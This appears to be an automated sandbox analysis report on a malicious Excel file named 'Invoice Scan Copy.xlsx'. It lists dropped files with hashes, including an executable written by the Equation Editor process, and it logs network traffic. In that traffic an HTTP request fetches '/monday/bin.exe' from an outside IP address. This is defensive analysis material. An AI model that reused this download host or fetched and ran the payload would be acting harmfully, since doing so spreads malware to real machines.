        SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
        Malicious:false
        Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD13AC20.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
        Category:dropped
        Size (bytes):14198
        Entropy (8bit):7.916688725116637
        Encrypted:false
        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
        SHA1:72CA86D260330FC32246D28349C07933E427065D
        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
        Malicious:false
        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C34B3C7D.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):84203
        Entropy (8bit):7.979766688932294
        Encrypted:false
        SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
        MD5:208FD40D2F72D9AED77A86A44782E9E2
        SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
        SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
        SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
        Malicious:false
        Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD20E05A.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
        Category:dropped
        Size (bytes):85020
        Entropy (8bit):7.2472785111025875
        Encrypted:false
        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
        MD5:738BDB90A9D8929A5FB2D06775F3336F
        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
        Malicious:false
        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5351646.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):6815
        Entropy (8bit):7.871668067811304
        Encrypted:false
        SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
        MD5:E2267BEF7933F02C009EAEFC464EB83D
        SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
        SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
        SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
        Malicious:false
        Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD9E3157.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):33795
        Entropy (8bit):7.909466841535462
        Encrypted:false
        SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
        MD5:613C306C3CC7C3367595D71BEECD5DE4
        SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
        SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
        SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
        Malicious:false
        Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F90E5EC2.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
        Category:dropped
        Size (bytes):85020
        Entropy (8bit):7.2472785111025875
        Encrypted:false
        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
        MD5:738BDB90A9D8929A5FB2D06775F3336F
        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
        Malicious:false
        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD764244.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
        Category:dropped
        Size (bytes):7006
        Entropy (8bit):7.000232770071406
        Encrypted:false
        SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
        MD5:971312D4A6C9BE9B496160215FE59C19
        SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
        SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
        SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
        Malicious:false
        Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF814285.emf
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):7788
        Entropy (8bit):5.53391183757474
        Encrypted:false
        SSDEEP:96:wACblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHX:wVTNAK4oOIGbK1RvVwPAWmOHX
        MD5:A859EC0B881B9D0C36846383837EA228
        SHA1:154FF877E74001E719C8AC3FBF683A4199A72F5C
        SHA-256:6CA88DC81EB9F2CD380BFCCC2131DFF1299F504AD2396CDCC8A31EAE86B3393D
        SHA-512:22D41EE1817609D94F92B661EBE0B621D040AC1CC1934B86C02C8C41BF6A890777942248BF4F3D88B7098C7901FB4E41E5FBF9BEA811F3C3BB7D7BBB36C0B145
        Malicious:false
        Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X...x...d......................@....p....\..................p.......<5.u..p....`.p.X..$y.w.................w....$.....U.d.......$...^.p.....^.p......Hl......-.......<.w................<.9u.Z.v....X.n.....X.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
        C:\Users\user\Desktop\~$Invoice Scan Copy.xlsx
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):330
        Entropy (8bit):1.4377382811115937
        Encrypted:false
        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
        MD5:96114D75E30EBD26B572C1FC83D1D02E
        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
        Malicious:true
        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        C:\Users\Public\vbc.exe
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):114688
        Entropy (8bit):5.922781856329279
        Encrypted:false
        SSDEEP:1536:xo2acYtmTskMt0qDKxxNSoxhNCEtmzlrEe07W+YJ+:FatmTTMtCxNSo55Ylr6YJ+
        MD5:F378C63405C6FA0B24C2E4C142C42E9F
        SHA1:A8751014349135E8D4B13CB947444AD6C222588C
        SHA-256:44EACB84C8AE24A115769DB8BB7FCA7D2AD14CF70A905BB57D54B175FFA4DA60
        SHA-512:629DBA1401657DC2C56265E7A8A9F71F017D3B2A249327DF7C30669FEB18C3C543CC4270B9640905CB32F97559332E4670759DD002F45331DBD98C3D100228F2
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 29%
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L...Wp.J.................`...P...............p....@.............B...................-........................................h..(........1..................................................................(... .......X............................text....].......`.................. ..`.data...4....p.......p..............@....rsrc....1.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

        Static File Info

        General

        File type:CDFV2 Encrypted
        Entropy (8bit):7.988304533184484
        TrID:
        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
        File name:Invoice Scan Copy.xlsx
        File size:602184
        MD5:026c63b9e090a6bf86cc8b6a4549290a
        SHA1:39fa74d1c7de05c25466cb057ba984ec08c0848b
        SHA256:6e6e60afa39ac72cca4e828ef18e8650105635cea693048061483b7e44f60497
        SHA512:6c516e0e9492c4fa632f767144321fd2592b02e4c8e3d0d120ecb9bb51f6dbf92fee353021bd829bd568d9428c05745fd64ca6021b46d74ad045ab7e119c3f41
        SSDEEP:12288:D+ILbJYq50izDA1VvsG2KVS4U4syHm1tJ1MBHB6VaEwTuUQ:DPnJYqX0/60NU4sx1tEkaEqHQ
        File Content Preview:........................>.......................................................................................|..............................................................................................................................................

        File Icon

        Icon Hash:e4e2aa8aa4b4bcb4

        Network Behavior

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Sep 13, 2021 20:46:06.211194038 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.325308084 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.325421095 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.325984001 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.438134909 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.438165903 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.438194990 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.438304901 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.438769102 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.438801050 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.438815117 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.438832045 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.438833952 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.438838005 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.438858986 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.438865900 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.438884974 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.438893080 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.438909054 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.438924074 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.438935995 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.438941002 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.438982010 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.448915958 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549235106 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549268007 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549292088 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549299002 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549315929 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549323082 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549325943 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549352884 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549546003 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549571037 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549592972 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549597979 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549618959 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549621105 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549626112 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549643040 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549654007 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549664974 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549679041 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549685001 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549700022 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549710989 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549732924 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549734116 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549757004 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549757957 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549762964 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549782038 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549793005 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549806118 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549815893 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549829960 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549839020 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549846888 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549876928 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549879074 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549896955 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.549904108 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549912930 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.549928904 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.550829887 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.660903931 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.660943985 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.660972118 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661001921 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.661005974 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661022902 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.661036968 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.661037922 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661068916 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.661068916 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661098957 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661099911 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.661128044 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661128998 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.661156893 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.661452055 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661484957 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661500931 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.661513090 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661513090 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.661540985 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661546946 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.661567926 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661571026 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.661591053 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.661672115 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.662069082 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.662111044 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.662126064 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.662142038 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.662143946 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.662169933 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.662170887 CEST4916580192.168.2.22192.3.141.149
        Sep 13, 2021 20:46:06.662198067 CEST8049165192.3.141.149192.168.2.22
        Sep 13, 2021 20:46:06.662200928 CEST4916580192.168.2.22192.3.141.149

        HTTP Request Dependency Graph

        • 192.3.141.149

        HTTP Packets

        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.2249165192.3.141.14980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        TimestampkBytes transferredDirectionData
        Sep 13, 2021 20:46:06.325984001 CEST0OUTGET /monday/bin.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 192.3.141.149
        Connection: Keep-Alive
        Sep 13, 2021 20:46:06.438134909 CEST1INHTTP/1.1 200 OK
        Date: Mon, 13 Sep 2021 18:46:06 GMT
        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
        Last-Modified: Sun, 12 Sep 2021 19:01:15 GMT
        ETag: "1c000-5cbd0f90d4415"
        Accept-Ranges: bytes
        Content-Length: 114688
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
